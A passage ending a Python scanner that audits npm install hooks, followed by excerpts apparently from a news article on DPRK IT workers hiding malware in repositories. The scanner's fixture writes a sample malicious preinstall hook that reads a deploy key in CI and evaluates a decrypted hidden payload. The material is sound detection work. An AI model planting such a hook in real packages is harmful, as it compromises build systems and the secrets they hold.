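        "https.get('https://cdn.example/fast-native.node', r => r.pipe(process.stdout));\n")
    # The pattern from the report: preinstall hook, CI check, encrypted payload in a hidden dir.
    put("node_modules/@jupyter-utils/rpc/package.json",
        json.dumps({"name": "@jupyter-utils/rpc", "scripts": {"preinstall": "node scripts/setup.js"}}))
    put("node_modules/@jupyter-utils/rpc/scripts/setup.js",
        "const fs = require('fs'), vm = require('vm');\n"
        "if (fs.existsSync('.github/workflows') || fs.existsSync('.gitlab-ci')) {\n"
        "  const key = Buffer.from(process.env.DEPLOY_KEY || '', 'hex');\n"
        "  vm.runInThisContext(decrypt(fs.readFileSync('.vendor/payload.enc'), key));\n"
        "}\n")
    put("node_modules/@jupyter-utils/rpc/.vendor/payload.enc", "<ciphertext placeholder>")
    return root


def _script_targets(command, pkg_dir):
    """Local .js files the hook command passes to node, if they exist on disk."""
    targets = []
    for m in re.finditer(r"\bnode\s+(\S+\.[cm]?js)\b", command):
        path = os.path.join(pkg_dir, m.group(1))
        if os.path.isfile(path):
            targets.append(path)
    return targets


def audit_install_scripts(root):
    """One finding per lifecycle hook found under root, with risk markers and hidden dirs."""
    findings = []
    for pkg_dir, dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        with open(os.path.join(pkg_dir, "package.json"), encoding="utf-8") as fh:
            try:
                meta = json.load(fh)
            except ValueError:
                continue
        hidden = sorted(d for d in dirnames if d in HIDDEN_STAGING_DIRS)
        for hook, command in meta.get("scripts", {}).items():
            if hook not in LIFECYCLE_HOOKS:
                continue
            text = command
            for path in _script_targets(command, pkg_dir):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text += "\n" + fh.read()
            findings.append({
                "package": meta.get("name", os.path.relpath(pkg_dir, root)),
                "hook": hook,
                "command": command,
                "markers": [name for name, rx in RISK_MARKERS if rx.search(text)],
                "hidden_dirs": hidden,
            })
    return findings


if __name__ == "__main__":
    for finding in audit_install_scripts(build_sample_tree()):
        print(finding)
```

The legitimate native package lights up two markers too, which is the point: hooks that fetch from the network are common enough that the list needs triage, whereas dynamic-eval plus an encrypted blob in a hidden directory is the report's pattern and has no benign reading. While a tree is being vetted, npm ci --ignore-scripts installs the packages without running any of these hooks.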

    The figure below illustrates how the primary repository README masks the scripts folder; a second figure (deepfake_result.png) shows the deepfake profile image used to enhance credibility.

    DPRK IT Worker’s Git Profile (Source – THE RAVEN FILE)

    By embedding itself at the package manager level and leveraging CI/CD hooks, the malware achieves both stealthy installation and persistence.

    Removal requires a thorough dependency audit and review of every installation script; installing with npm’s --ignore-scripts flag prevents preinstall hooks from running at all while packages are being vetted.

    Most wanted by the FBI (Source – THE RAVEN FILE)

    As organizations increasingly rely on open-source components, understanding these infection vectors is critical to safeguarding supply chains and maintaining trust in collaborative development platforms.

    The post DPRK IT Workers Using Code-Sharing Platforms to Secure New Remote Jobs appeared first on Cyber Security News.
